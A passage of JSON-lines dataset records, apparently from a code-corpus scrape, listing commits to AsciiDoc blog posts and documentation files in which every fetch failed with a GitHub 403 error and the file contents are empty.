rch,mortonsykes\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,diendt\/elasticsearch,njlawton\/elasticsearch,zhiqinghuang\/elasticsearch,mgalushka\/elasticsearch,Liziyao\/elasticsearch,huypx1292\/elasticsearch,s1monw\/elasticsearch,Charlesdong\/elasticsearch,khiraiwa\/elasticsearch,jw0201\/elastic,sarwarbhuiyan\/elasticsearch,Ansh90\/elasticsearch,sarwarbhuiyan\/elasticsearch,wuranbo\/elasticsearch,Clairebi\/ElasticsearchClone,IanvsPoplicola\/elasticsearch,zeroctu\/elasticsearch,Microsoft\/elasticsearch,kcompher\/elasticsearch,wbowling\/elasticsearch,yanjunh\/elasticsearch,bawse\/elasticsearch,LewayneNaidoo\/elasticsearch,vvcephei\/elasticsearch,janmejay\/elasticsearch,spiegela\/elasticsearch,kubum\/elasticsearch,nomoa\/elasticsearch,linglaiyao1314\/elasticsearch,jpountz\/elasticsearch,clintongormley\/elasticsearch,ESamir\/elasticsearch,pablocastro\/elasticsearch,feiqitian\/elasticsearch,beiske\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elasticassandra,mjhennig\/elasticsearch,nellicus\/elasticsearch,overcome\/elasticsearch,kalimatas\/elasticsearch,vvcephei\/elasticsearch,JervyShi\/elasticsearch,wimvds\/elasticsearch,vietlq\/elasticsearch,NBSW\/elasticsearch,Ansh90\/elasticsearch,kevinkluge\/elasticsearch,kimimj\/elasticsearch,jbertouch\/elasticsearch,Clairebi\/ElasticsearchClone,rmuir\/elasticsearch,kcompher\/elasticsearch,sjohnr\/elasticsearch,dongjoon-hyun\/elasticsearch,markharwood\/elasticsearch,strapdata\/elassandra-test,iacdingping\/elasticsearch,gmarz\/elasticsearch,rhoml\/elasticsearch,rento19962\/elasticsearch,ajhalani\/elasticsearch,girirajsharma\/elasticsearch,jbertouch\/elasticsearch,ckclark\/elasticsearch,diendt\/elasticsearch,AleksKochev\/elasticsearch,shreejay\/elasticsearch,Charlesdong\/elasticsearch,anti-social\/elasticsearch,hanswang\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarc
iaAlves\/elasticsearch,hirdesh2008\/elasticsearch,umeshdangat\/elasticsearch,gmarz\/elasticsearch,markllama\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,nrkkalyan\/elasticsearch,sauravmondallive\/elasticsearch,andrejserafim\/elasticsearch,mnylen\/elasticsearch,wenpos\/elasticsearch,polyfractal\/elasticsearch,F0lha\/elasticsearch,Uiho\/elasticsearch,mohit\/elasticsearch,EasonYi\/elasticsearch,kalimatas\/elasticsearch,MetSystem\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,hirdesh2008\/elasticsearch,kalimatas\/elasticsearch,ImpressTV\/elasticsearch,lmtwga\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,amit-shar\/elasticsearch,AndreKR\/elasticsearch,skearns64\/elasticsearch,mikemccand\/elasticsearch,weipinghe\/elasticsearch,jaynblue\/elasticsearch,Ansh90\/elasticsearch,Liziyao\/elasticsearch,vrkansagara\/elasticsearch,hanswang\/elasticsearch,KimTaehee\/elasticsearch,SergVro\/elasticsearch,hanst\/elasticsearch,Chhunlong\/elasticsearch,strapdata\/elassandra-test,caengcjd\/elasticsearch,golubev\/elasticsearch,zeroctu\/elasticsearch,luiseduardohdbackup\/elasticsearch,khiraiwa\/elasticsearch,Shekharrajak\/elasticsearch,sauravmondallive\/elasticsearch,Ansh90\/elasticsearch,geidies\/elasticsearch,sneivandt\/elasticsearch,fekaputra\/elasticsearch,cnfire\/elasticsearch-1,JervyShi\/elasticsearch,ulkas\/elasticsearch,dylan8902\/elasticsearch,loconsolutions\/elasticsearch,javachengwc\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,sauravmondallive\/elasticsearch,sc0ttkclark\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,episerver\/elasticsearch,cwurm\/elasticsearch,tebriel\/elasticsearch,Widen\/elasticsearch,knight1128\/elasticsearch,karthikjaps\/elasticsearch,Rygbee\/elasticsearch,mapr\/elasticsearch,LeoYao\/elasticsearch,linglaiyao1314\/elasticsearch,kubum\/elasticsearch,fred84\/elasticsearch,btiernay\/elasticsearch,Widen\/elasticsearch,Brijeshrpatel9\/elasticsearch,sposam\/elasticsearch,iacdingping\/elasticsearch,markharwood\/elasticsearch,likaiwalkman\/elasticsearch,yongminxia\/elasticsearch,drewr\/elasticsearch,iantruslove\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,himanshuag\/elasticsearch,xingguang2013\/elasticsearch,thecocce\/elasticsearch,strapdata\/elassandra-test,abibell\/elasticsearch,HarishAtGitHub\/elasticsearch,achow\/elasticsearch,jeteve\/elasticsearch,ImpressTV\/elasticsearch,jango2015\/elasticsearch,mrorii\/elasticsearch,nknize\/elasticsearch,andrestc\/elasticsearch,szroland\/elasticsearch,himanshuag\/elasticsearch,yynil\/elasticsearch,mbrukman\/elasticsearch,zeroctu\/elasticsearch,clintongormley\/elasticsearch,zhiqinghuang\/elasticsearch,springning\/elasticsearch,ImpressTV\/elasticsearch,ydsakyclguozi\/elasticsearch,fekaputra\/elasticsearch,mgalushka\/elasticsearch,jbertouch\/elasticsearch,skearns64\/elasticsearch,YosuaMichael\/elasticsearch,sarwarbhuiyan\/elasticsearch,hafkensite\/elasticsearch,Fsero\/elasticsearch,mute\/elasticsearch,artnowo\/elasticsearch,sneivandt\/elasticsearch,kevinkluge\/elasticsearch,yuy168\/elasticsearch,tcucchietti\/elasticsearch,slavau\/elasticsearch,humandb\/elasticsearch,palecur\/elasticsearch,slavau\/elasticsearch,fforbeck\/elasticsearch,kunallimaye\/elasticsearch,wbowling\/elasticsearch,kkirsche\/elasticsearch,jchampion\/elasticsearch,sarwarbhuiyan\/elasticsearch,yanjunh\/elasticsearch,jango2015\/elasticsearch,Asimov4\/elasticsearch,nazarewk\/elasticsearch,Shekharrajak\/elasticsearch,iantruslove\/elasticsearch,jango2015\/el
asticsearch,MjAbuz\/elasticsearch,alexkuk\/elasticsearch,milodky\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra-test,PhaedrusTheGreek\/elasticsearch,pranavraman\/elasticsearch,lzo\/elasticsearch-1,kalburgimanjunath\/elasticsearch,lightslife\/elasticsearch,liweinan0423\/elasticsearch,tcucchietti\/elasticsearch,phani546\/elasticsearch,ckclark\/elasticsearch,iacdingping\/elasticsearch,lmtwga\/elasticsearch,rhoml\/elasticsearch,AshishThakur\/elasticsearch,scorpionvicky\/elasticsearch,anti-social\/elasticsearch,fforbeck\/elasticsearch,markharwood\/elasticsearch,njlawton\/elasticsearch,Microsoft\/elasticsearch,lks21c\/elasticsearch,lchennup\/elasticsearch,myelin\/elasticsearch,loconsolutions\/elasticsearch,tahaemin\/elasticsearch,iantruslove\/elasticsearch,areek\/elasticsearch,opendatasoft\/elasticsearch,Uiho\/elasticsearch,kaneshin\/elasticsearch,huypx1292\/elasticsearch,Chhunlong\/elasticsearch,wayeast\/elasticsearch,sreeramjayan\/elasticsearch,lmtwga\/elasticsearch,wayeast\/elasticsearch,petmit\/elasticsearch,petmit\/elasticsearch,lydonchandra\/elasticsearch,beiske\/elasticsearch,Flipkart\/elasticsearch,jimczi\/elasticsearch,caengcjd\/elasticsearch,bestwpw\/elasticsearch,Rygbee\/elasticsearch,wayeast\/elasticsearch,lydonchandra\/elasticsearch,karthikjaps\/elasticsearch,markwalkom\/elasticsearch,davidvgalbraith\/elasticsearch,luiseduardohdbackup\/elasticsearch,pritishppai\/elasticsearch,weipinghe\/elasticsearch,sc0ttkclark\/elasticsearch,tsohil\/elasticsearch,weipinghe\/elasticsearch,golubev\/elasticsearch,smflorentino\/elasticsearch,iamjakob\/elasticsearch,shreejay\/elasticsearch,schonfeld\/elasticsearch,ydsakyclguozi\/elasticsearch,njlawton\/elasticsearch,loconsolutions\/elasticsearch,amit-shar\/elasticsearch,wangyuxue\/elasticsearch,SergVro\/elasticsearch,pranavraman\/elasticsearch,AndreKR\/elasticsearch,ricardocerq\/elasticsearch,sscarduzio\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,knight1128\/elasticsearch,SergVro\/elasticsearch,adrianbk\/elasticsearch,martinstuga\/elasticsearch,scottsom\/elasticsearch,sreeramjayan\/elasticsearch,mkis-\/elasticsearch,gfyoung\/elasticsearch,schonfeld\/elasticsearch,MaineC\/elasticsearch,palecur\/elasticsearch,mikemccand\/elasticsearch,knight1128\/elasticsearch,slavau\/elasticsearch,MjAbuz\/elasticsearch,wittyameta\/elasticsearch,humandb\/elasticsearch,mgalushka\/elasticsearch,JervyShi\/elasticsearch,LewayneNaidoo\/elasticsearch,apepper\/elasticsearch,kkirsche\/elasticsearch,alexbrasetvik\/elasticsearch,Collaborne\/elasticsearch,queirozfcom\/elasticsearch,scorpionvicky\/elasticsearch,alexbrasetvik\/elasticsearch,AshishThakur\/elasticsearch,Asimov4\/elasticsearch,jango2015\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,humandb\/elasticsearch,overcome\/elasticsearch,Shekharrajak\/elasticsearch,episerver\/elasticsearch,andrestc\/elasticsearch,djschny\/elasticsearch,pritishppai\/elasticsearch,areek\/elasticsearch,KimTaehee\/elasticsearch,kalburgimanjunath\/elasticsearch,drewr\/elasticsearch,Fsero\/elasticsearch,mute\/elasticsearch,avikurapati\/elasticsearch,milodky\/elasticsearch,Uiho\/elasticsearch,socialrank\/elasticsearch,vvcephei\/elasticsearch,mrorii\/elasticsearch,codebunt\/elasticsearch,henakamaMSFT\/elasticsearch,tebriel\/elasticsearch,maddin2016\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,huypx1292\/elasticsearch,scorpionvicky\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,phani546\/elasticsearch,pritishppai\/elasticsearch,hafkensite\/elasticsearch,tkssharma\/elasticsearch,gfyoung\/
elasticsearch,AshishThakur\/elasticsearch,hafkensite\/elasticsearch,linglaiyao1314\/elasticsearch,18098924759\/elasticsearch,lks21c\/elasticsearch,socialrank\/elasticsearch,wangtuo\/elasticsearch,AleksKochev\/elasticsearch,huanzhong\/elasticsearch,JSCooke\/elasticsearch,TonyChai24\/ESSource,dylan8902\/elasticsearch,vingupta3\/elasticsearch,trangvh\/elasticsearch,rento19962\/elasticsearch,franklanganke\/elasticsearch,bestwpw\/elasticsearch,szroland\/elasticsearch,loconsolutions\/elasticsearch,mm0\/elasticsearch,nellicus\/elasticsearch,umeshdangat\/elasticsearch,rlugojr\/elasticsearch,MjAbuz\/elasticsearch,kenshin233\/elasticsearch,tkssharma\/elasticsearch,Rygbee\/elasticsearch,nknize\/elasticsearch,areek\/elasticsearch,apepper\/elasticsearch,YosuaMichael\/elasticsearch,fekaputra\/elasticsearch,janmejay\/elasticsearch,a2lin\/elasticsearch,MichaelLiZhou\/elasticsearch,lzo\/elasticsearch-1,opendatasoft\/elasticsearch,ivansun1010\/elasticsearch,kubum\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,adrianbk\/elasticsearch,yynil\/elasticsearch,Helen-Zhao\/elasticsearch,palecur\/elasticsearch,pozhidaevak\/elasticsearch,avikurapati\/elasticsearch,alexshadow007\/elasticsearch,Flipkart\/elasticsearch,lmtwga\/elasticsearch,myelin\/elasticsearch,vrkansagara\/elasticsearch,tahaemin\/elasticsearch,jeteve\/elasticsearch,elancom\/elasticsearch,skearns64\/elasticsearch,ydsakyclguozi\/elasticsearch,ulkas\/elasticsearch,adrianbk\/elasticsearch,tcucchietti\/elasticsearch,Brijeshrpatel9\/elasticsearch,i-am-Nathan\/elasticsearch,mmaracic\/elasticsearch,btiernay\/elasticsearch,hydro2k\/elasticsearch,ulkas\/elasticsearch,naveenhooda2000\/elasticsearch,ouyangkongtong\/elasticsearch,tahaemin\/elasticsearch,sposam\/elasticsearch,mbrukman\/elasticsearch,sjohnr\/elasticsearch,xingguang2013\/elasticsearch,sauravmondallive\/elasticsearch,MetSystem\/elasticsearch,dylan8902\/elasticsearch,rento19962\/elasticsearch,vrkansagara\/elasticsearch,s1monw\/elasticsearch,jpountz\/elasticsearch,MichaelLiZhou\/elasticsearch,markwalkom\/elasticsearch,andrejserafim\/elasticsearch,yynil\/elasticsearch,vietlq\/elasticsearch,HarishAtGitHub\/elasticsearch,MaineC\/elasticsearch,mute\/elasticsearch,a2lin\/elasticsearch,TonyChai24\/ESSource,koxa29\/elasticsearch,NBSW\/elasticsearch,xpandan\/elasticsearch,alexshadow007\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/bucket\/reverse-nested-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/bucket\/reverse-nested-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"86579f3299fe36728bf1e71072d94ff0a65713b5","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1700b3ab55f6ff03c910f269af98a649128d9521","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f9e2bd0c8dbe702fa103167d7d4ab68eeefe27","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf426c67eb8d5a1f8f5845e41528750d3ea01d4c","subject":"Add readme template","message":"Add readme template\n","repos":"chevdor\/generator-chocolatey","old_file":"app\/templates\/_readme.adoc","new_file":"app\/templates\/_readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chevdor\/generator-chocolatey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6df26c987c1df2ab067e7ff1b5b09ca268f79542","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-Is%20The%20LG%20V30%20The%20Most%20Underrated%20Smartphone%3F.adoc","new_file":"_posts\/2018-02-03-Is%20The%20LG%20V30%20The%20Most%20Underrated%20Smartphone%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f037a6205ce59cdb0ab6a23540407b93aa9f8f90","subject":"Create spec.adoc","message":"Create spec.adoc","repos":"clara-labs\/react-popover,gregory90\/react-popover,rainforestapp\/react-popover,t3chnoboy\/react-popover,prayogoa\/react-popover,littlebits\/react-popover,derekr\/react-popover","old_file":"spec.adoc","new_file":"spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/derekr\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d7c0675b6e386571a96169bd39c26f59442733","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 
2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc5de9841c4458a6a4e5f5015d53c0c3ee1812c","subject":"y2b create post PlayStation Move Sharp Shooter Unboxing \\u0026 Overview","message":"y2b create post PlayStation Move Sharp Shooter Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-26-PlayStation-Move-Sharp-Shooter-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-26-PlayStation-Move-Sharp-Shooter-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66b820b7cfd7c493eb0fb23a2ccef7c9863c5974","subject":"Update 2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","message":"Update 2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","new_file":"_posts\/2016-06-07-Folding-the-Universe-part-I-I-I-Java-8-List-and-Stream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a4dd4ff3aab53a2f414feaf74291463503529a4","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccf780a46b01fb16b5cbb6785c590d7ab0b50cf5","subject":"Publish 20161110-1347.adoc","message":"Publish 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1347.adoc","new_file":"20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8385fb00767871b9f11d78324f8cf4cbc4ca27d","subject":"edit Changelog","message":"edit 
Changelog\n","repos":"BernhardLindner\/Image-Generator","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BernhardLindner\/Image-Generator.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605be9474a768bab872512f841f317e6f00bf2fc","subject":"Update 2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","message":"Update 2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","new_file":"_posts\/2017-01-24-Dealing-with-CORS-in-a-Development-Environment-Use-a-reverse-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f9d63e96a6ced056957904e71901737a62c28","subject":"Update 2016-12-06-Line-Break-Doc-Title.adoc","message":"Update 2016-12-06-Line-Break-Doc-Title.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-Line-Break-Doc-Title.adoc","new_file":"_posts\/2016-12-06-Line-Break-Doc-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"284108e00ee0a4011b62e7e32f122abf923544f8","subject":"y2b create post The Secret Android Button","message":"y2b create post The Secret Android Button","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-13-The-Secret-Android-Button.adoc","new_file":"_posts\/2016-04-13-The-Secret-Android-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4367adffe6ba33d13eb1b968dd5898bf557245c3","subject":"[DOCS] Fixed typo.","message":"[DOCS] Fixed typo.\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@e09feb4863c5760b5264a0cf9e464099a9963454\n","repos":"GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,gingerwizard\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/en\/setup-xes.asciidoc","new_file":"docs\/en\/setup-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2946157734b2c3a43ff30305066c2991295d8c07","subject":"add changelog","message":"add changelog\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/memoization.java.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"b22924276e26aa92afce30acd3b7ee36d27c453e","subject":"Update 2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","message":"Update 2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","repos":"jerometambo\/blog,jerometambo\/blog,jerometambo\/blog,jerometambo\/blog","old_file":"_posts\/2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","new_file":"_posts\/2016-12-13-How-to-use-CXF-3x-implementation-of-JAX-RS-20-REST-with-Weblogic-12c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerometambo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ad4cc6c20e025218bf396b5bd6472661033abb","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d65c27e8e4edb1206dbce94ae8964ce51fd25c1","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2321f5f905d84e938b238dbae382f2a3e3b87151","subject":"Updated readme title and remove old project link","message":"Updated readme title and remove old project link\n","repos":"javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"resilience4j-retrofit\/README.adoc","new_file":"resilience4j-retrofit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"beff04687fa6500d92572e15f701467bf435f2d6","subject":"Non-obvious use of extra parameters","message":"Non-obvious use of extra parameters\n\nExtract them into separate `additional` optional object.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d08d07d75a8d5eb99709a6eb40ebe845f91fb9d1","subject":"Minor typo for `chain_id` parameter description","message":"Minor typo for `chain_id` parameter description\n\nFix it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"720575ca411b4d9b5e34fc2cdfbaa044375b9f18","subject":"y2b create post Avenger Elite for XBOX 360 Controller Unboxing \\u0026 First Look","message":"y2b create post Avenger Elite for XBOX 360 Controller Unboxing \\u0026 First 